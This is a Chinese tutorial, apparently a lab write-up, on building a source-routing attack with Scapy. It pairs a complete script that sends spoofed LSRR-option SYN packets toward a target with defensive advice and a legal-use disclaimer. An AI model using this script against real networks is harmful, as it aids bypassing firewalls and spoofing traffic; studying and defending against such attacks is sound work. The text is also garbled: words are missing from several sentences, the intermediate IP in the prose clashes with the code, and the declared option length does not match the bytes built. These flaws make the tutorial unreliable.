使用 Scapy 库编写源路由攻击脚本

一、介绍

源路由是一种网络攻击方法，通过利用IP数据包中的源路由选项来控制数据包的传输路径，从而绕过安全设备或防火墙，直接访问目标系统。源路由功能允许数据包的发送方指定数据包通过的路径，而不是由路由器根据路由表动态决定路径。虽然源路由在某些网络管理和诊断中有其合法用途，但也可以被恶意利用进行。

1.1 源路由类型

1. 松散源路由（Loose Source Routing, LSRR）：

• 数据包必须经过指定的一些中间节点，但在这些节点之间的路径由路由器自行决定。

1. 严格源路由（Strict Source Routing, SSRR）：

• 数据包必须严格按照指定的路径经过所有中间节点。

1.2 原理

在源路由中，利用源路由选项创建数据包，并指定这些数据包应通过的路径。通过这种方式，攻击者可以：

• 绕过防火墙和其他安全设备。
• 访问本来无法直接访问的网络部分。

• 进行网络探测和信息收集。
• 实施其他类型的网络，如中间人。

1.3 防御措施

为了防止源路由攻击，可以采取以下措施：

1. 禁用源路由功能：

• 在网络设备（如路由器、防火墙）上禁用源路由功能。这通常可以通过设备的配置接口完成。

2. 配置防火墙规则：

• 配置防火墙规则以丢弃包含源路由选项的数据包。许多现代防火墙默认会丢弃这些数据包。

3. 使用入侵检测系统（IDS）：

• 部署入侵检测系统，如Snort，监控网络流量，检测和报警包含源路由选项的数据包。

2. 网络分段和隔离：

• 通过网络分段和隔离，限制攻击者能够到达的网络范围，减少面。

二、实验环境

• 攻击者IP地址：192.168.1.103
• 中间节点IP地址：192.168.134.147
• 目标IP地址：192.168.1.128

三、实验步骤

1. 配置攻击环境：确保攻击者计算机安装了Scapy，并且能够访问中间节点和目标。
   
2. 使用Scapy构造带有源路由选项的IP包：
   我们将构造一百个数据包，使其经过中间节点192.168.1.133再到达目标192.168.1.128。
   

from scapy.all import *
from scapy.layers.inet import IPOption
import time
 
# 攻击者IP地址（源IP）
attacker_ip = "192.168.1.103"
 
# 中间节点IP地址
middle_node_ip = "192.168.134.147"
 
# 目标IP地址
target_ip = "192.168.1.128"
 
# 构造带有源路由选项的IP包
lsrr_option = IPOption(b'\x83\x0c\x04' + inet_aton(middle_node_ip) + inet_aton(target_ip))
 
ip_layer = IP(src=attacker_ip, dst=target_ip, options=[lsrr_option])
tcp_layer = TCP(dport=8030, flags='S')
 
# 创建完整的数据包
packet = ip_layer / tcp_layer
 
# 发送一百个数据包，每个之间间隔0.1秒
for _ in range(100):
    send(packet)
    time.sleep(0.1)  # 设置间隔时间，单位为秒

代码解析：

1. 导入模块：

• from scapy.all import *：导入Scapy的所有功能。
• from scapy.layers.inet import IPOption：从Scapy的inet层导入IPOption类，用于设置IP选项。
• import time：导入Python标准库的time模块，用于控制时间间隔。

1. 定义IP地址：

• attacker_ip：定义攻击者的IP地址。
• middle_node_ip：定义中间节点的IP地址。
• target_ip：定义目标的IP地址。

构造源路由选项：

• IPOption：创建一个IP选项实例。
• b'\x83\x0c\x04'：表示LSRR选项的类型和长度。

• \x83：LSRR选项类型（131）。

• \x0c：选项长度（12字节）。
• \x04：指针位置（指向中间节点的IP地址）。

• inet_aton(middle_node_ip)：将中间节点IP地址转换为二进制格式。

• inet_aton(target_ip)：将目标IP地址转换为二进制格式。
• 将这些部分连接起来，形成完整的LSRR选项。

1. 构造IP层：

• IP：创建一个IP包实例。
• src=attacker_ip：设置源IP地址。
• dst=target_ip：设置目标IP地址。
• options=[lsrr_option]：设置IP选项为之前构造的LSRR选项。

1. 构造TCP层：

• TCP：创建一个TCP包实例。
• dport=8030：设置目标端口为8030。
• flags='S'：设置TCP标志为SYN（表示连接请求）。

1. 创建完整的数据包：

• 使用/操作符将IP层和TCP层组合起来，形成一个完整的数据包。

2. 发送数据包：

• for _ in range(100)：创建一个循环，循环100次。
• send(packet)：使用Scapy的send函数发送构造好的数据包。
• time.sleep(0.1)：在每次发送后，暂停0.1秒。这是为了控制发送速率，避免过快的发送可能导致网络拥堵或被检测。

注意：确认你所使用的网络设备是否支持源路由选项。一些现代网络设备默认会禁用这种功能

四、防御源路由

1. 禁用源路由选项：

• 在路由器和防火墙中禁用IP包的源路由选项。

1. 过滤和监控：

• 使用入侵检测系统（IDS）和防火墙规则过滤包含源路由选项的数据包。
• 定期监控网络流量，检测和响应异常行为。

2. 使用加密和认证：
   

• 使用安全协议（如HTTPS、SSH）加密通信，防止中间人攻击。
• 在关键服务中实施强身份认证机制。

五、总结

通过上述实验，我们展示了如何利用源路由选项进行网络攻击。这种攻击可以用于多种目的，包括绕过访问控制和实施中间人攻击。为了保护网络免受源路由攻击，网络管理员应采取适当的安全措施，如禁用源路由选项、使用入侵检测系统以及加密网络通信。

再次强调，这些技术和方法应仅用于合法的安全测试和研究，未经授权的使用是非法的。